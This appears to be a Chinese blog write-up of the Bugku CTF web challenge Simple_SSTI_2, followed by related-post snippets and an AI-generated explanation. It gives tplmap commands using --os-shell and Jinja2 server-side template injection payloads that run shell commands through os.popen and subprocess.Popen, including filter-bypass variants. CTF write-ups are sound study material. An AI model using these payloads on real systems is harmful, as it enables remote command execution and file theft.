bugkuctf-Simple_SSTI_2

最新推荐文章于 2024-11-17 22:03:55 发布
最新推荐文章于 2024-11-17 22:03:55 发布
阅读量5.5k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: bugku题解-web 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_51775369/article/details/123406421
本文介绍了如何通过tplmap工具进行简单的输入输出操作,展示了两种方法:一是直接使用os-shell提权查看目录,二是构造flag参数获取app目录。重点在于如何利用安全漏洞获取权限并进行目录浏览。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

方法一:tplmap

直接扫
python2 tplmap.py -u 'http://114.67.175.224:10589/?flag' 


可以注入,使用–os-shell提权
python2 tplmap.py -u 'http://114.67.175.224:10589/?flag' --os-shell
ls查看目录

 

方法二 :flag构造参数

ls查看
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}
查看根目录

##__class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 ##__init__ 初始化类,返回的类型是function ##__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。 ##os.popen() 方法用于从一个命令打开一个管道。 ##open() 方法用于打开一个文件,并返回文件对象

 爆app

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app%27).read()%20}}

 最后cat flag得到flag

参考文章

Simple_SSTI_2 - 网抑云黑胶SVIP用户 - 博客园

BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 2024
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2
记录笔记
04-22 1063
Bugku--CTF-- Simple_SSTI_1 Simple_SSTI_2 二级标题
Bugku:Simple_SSTI_2
热门推荐
qq_46230755的博客
03-10 1万+
我超喜欢这种题目的,确实对我这种萌新非常的友好 打开后,题目提示存在模板注入 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进行一个个进入查看,运气很好,第一个看的app文件夹里就有flag ?flag={{%20config.__class__.__init__.__globals__[%27os%27].po
Bugku WEB Simple_SSTI_2
lin的博客
04-12 1607
1. 打开后,题目提示存在模板注入 2. 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 根据URL转换表,%20 -> 空格 %27 -> ', 上面的URL对应字符串为: /?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read(
Simple_SSTI_2
天天学安全专属博客
03-03 1087
Simple_SSTI_2,backup靶场
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2767
首先打开之后是上面这样,题目有提示是ssti,所以
BugKu:Simple_SSTI
m0_63944205的博客
07-30 215
如图所示,我们会得到相关的提示,根据提示信息,我们利用。1.这里我们看到需要我们注入一个flag参数。3.这里我们去传入flag查看config。1.这里告诉我们需要传一个flag的参数。3.这里我们利用flask的模板注入。的模板注入,就能直接得到flag。2.我们f12查看这里提示我们。2.我们同样的去查看页面源代码。发现页面很乱,不能得到有用信息。4.我们尝试SSTI模版注入。5.我们依次读取目录看看\。我们发现了flage目录,6.我们查看flage。
Bugku web Simple_SSTI_2 wp
Whaocai的博客
08-05 703
考点: ①SSTI注入 最近学了学python ssti注入,找一道题练习练习。 进去之后,提示我们有个flag参数,同时再用御剑扫一下发现没有别的页面。 结合题目,直接payload:?flag={{1+1}},用的是flask模板 jinja2引擎 常见的ssti构造payload思路是: 这道题比较简单,什么敏感关键词都没有过滤 ...
BUGKU-simple_SSTI_1漏洞注入
kingx3的博客
10-08 406
SSTI全称Server side template injection.服务端模板注入这节课主要讲flask的模板注入.flask会把类似于 的变量当做参数来渲染并填充到web页面,如果该参数可控并被后台解析则有可能被注入恶意代码导致注入漏洞请注意 模板注入只会存在于二次渲染中,无二次渲染不会出现模板注入。
BUGKU-WEB Simple_SSTI_2
天泽岁月
02-06 702
BUGKU-WEB Simple_SSTI_2
WEB Simple_SSTI_2
m0_57954651的博客
05-02 502
打开题目 似乎和第一题有相同之处 先来测试一下有没有类似注入的漏洞 回显正常 说明方向没错 再此构造 ?flag={{''.__class__.__mro__}}(借鉴大佬..) 用mro回显到了两类 str object 我们可利用第二的object来作突破 THEN 利用subclasses这个参数 __subclasses__属性会输出该类下所有的子类 ?flag={{''.__class__.__mro__[1].__subclasses__() }} 看到了里面的...
[bugku]Simple_SSTI_2
ZhShy
03-10 3494
进入页面之后F12没发现什么有用的东西。 照例看看config: http://114.67.175.224:12482/?flag={{config}} 没有flag 试一试 http://114.67.175.224:12482/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 __i
Bugku CTF_Web——Simple_SSTI_2
weixin_71914594的博客
11-17 259
发现这是python的模块注入。进入app目录找到flag。传入名为flag的参数。只能一个一个慢慢找了。
XCTF shrine wp
Lakers248_的博客
05-12 320
XCTF shrine wp
十九、bugku Simple_SSTI_2
山兔的博客
09-06 484
/?flag={{ config.__class__.__init__.__globals__['os'] .popen('ls ../').read() }} ?flag={{ config.__class__.__init__.__globals__['os'] .popen('cat ../app/flag').read() }} __class__:返回对象所属类 __init__:类的初始方法,用以初始化实例.实际上魔术方法 __new__与__init__共同作为"构造函数",__new_
Simple_SSTI_2 wp
张麦麦
11-08 245
payload {{"".__class__.__bases__[0].__subclasses__()[127].__init__.__globals__ ['popen']('cat flag').read()}}
bugku web Simple_SSTI_2
最新发布
03-27
<think>嗯,用户需要关于Bugku平台上Web题目Simple_SSTI_2的解决方案或详细信息。首先,我得回忆一下SSTI(服务器端模板注入)的基本概念。SSTI通常发生在使用模板引擎渲染用户输入时,如果未正确过滤输入,攻击者可以注入恶意代码。常见的模板引擎有Jinja2(Python)、Twig(PHP)、FreeMarker(Java)等。 题目是Simple_SSTI_2,可能比第一题稍难。可能需要绕过一些过滤器或黑名单。比如,某些关键字如"class"、"subclasses"可能被过滤,或者某些特殊字符被转义。用户可能需要找到替代的方法来访问对象的方法或属性。 首先,确定使用的模板引擎类型。例如,Bugku的题目可能基于Python的Flask框架,使用Jinja2模板。在Jinja2中,常用的Payload比如{{config}}或者通过对象继承链来执行命令。比如,通过访问''.__class__.__mro__[1].__subclasses__()来获取子类,寻找可利用的类如subprocess.Popen。 但是题目可能有过滤,比如过滤了下划线或某些关键字。这时候需要绕过,比如使用request.args或request.values来传递参数,或者使用字符串拼接、十六进制编码等方式。例如,将__class__拆分为'_'+'_class'+'_'+'_',或者使用其他属性访问方式如attr()方法。 另外,可能需要绕过对特定函数的限制,比如os模块被禁用,可以考虑使用其他模块如subprocess来执行命令。或者利用内置函数如__import__来动态导入模块。 假设题目中存在黑名单过滤了"class"、"subclasses"等关键字,那么可能需要寻找替代方法。例如,使用原生Python的魔术方法或属性,或者使用过滤器如|attr()来拼接字符串。例如,{{''|attr('__class__')}}来获取类对象。 另外,如果题目中存在对某些字符的过滤,比如双下划线被过滤,可以使用request对象中的参数来传递。例如,构造Payload为{{''[request.args.a][request.args.b][request.args.c]()}},然后通过URL参数传递a=__class__,b=__base__等。 还需要考虑如何执行系统命令。例如,找到subprocess.Popen类,然后调用它执行命令。可能需要遍历子类来找到可用的类。例如,在Jinja2中,可以通过{{''.__class__.__mro__[1].__subclasses__()}}来获取所有子类,然后找到索引对应的Popen类。 如果题目中有沙箱环境,可能需要更复杂的绕过方式,比如利用Python的内省机制或全局变量。例如,使用__globals__或__builtins__来访问需要的函数。 总结步骤可能为:确定模板引擎类型→探测过滤规则→构造Payload绕过过滤→访问对象继承链→找到可利用的类→执行命令获取flag。 可能需要参考类似题目的解法,比如通过{{config}}查看配置信息,或者通过{{''.__class__.__base__.__subclasses__()[X].__init__.__globals__}}来访问模块的全局变量,进而导入os模块执行命令。 最后,验证Payload的有效性,并确保在题目环境中正确执行。可能需要多次尝试不同的索引或方法,直到找到正确的子类索引。</think>### Bugku Web题目 Simple_SSTI_2 解决方案 #### 1. 漏洞背景 Simple_SSTI_2考察**服务器端模板注入(SSTI)**漏洞,常见于未严格过滤用户输入的模板引擎(如Jinja2)。攻击者通过注入恶意代码可执行任意命令或读取敏感数据[^1]。 #### 2. 基本分析步骤 1. **确定模板引擎类型** 输入`{{7*7}}`,若返回`49`则为Jinja2/Twig类引擎;若返回`7777777`则可能为其他引擎(如Mako)。 2. **探测过滤规则** 尝试基础Payload如`{{''.__class__}}`,若返回错误或空白,说明可能过滤了关键字(如`_`、`class`)。 例如题目可能过滤下划线,需改用其他方式(如`request.args`传参或字符串拼接)。 #### 3. 绕过过滤的Payload示例 假设题目过滤了`_`和`class`,可通过以下方式绕过: ```python {{ ''|attr(request.args.a) }}&a=__class__ ``` 或使用十六进制编码: ```python {{ ""|attr("\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f") }} ``` #### 4. 利用对象继承链执行命令 1. **获取基类** ```python {{ ''.__class__.__mro__[1] }} # 输出:<class 'object'> ``` 2. **遍历子类寻找可利用类** ```python {{ ''.__class__.__mro__[1].__subclasses__()[400] }} # 假设索引400为subprocess.Popen ``` 3. **执行系统命令** ```python {{ ''.__class__.__mro__[1].__subclasses__()[400]('ls', shell=True, stdout=-1).communicate() }} ``` #### 5. 获取Flag的典型Payload 若题目限制严格,可通过`__globals__`访问内置模块: ```python {{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }} ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值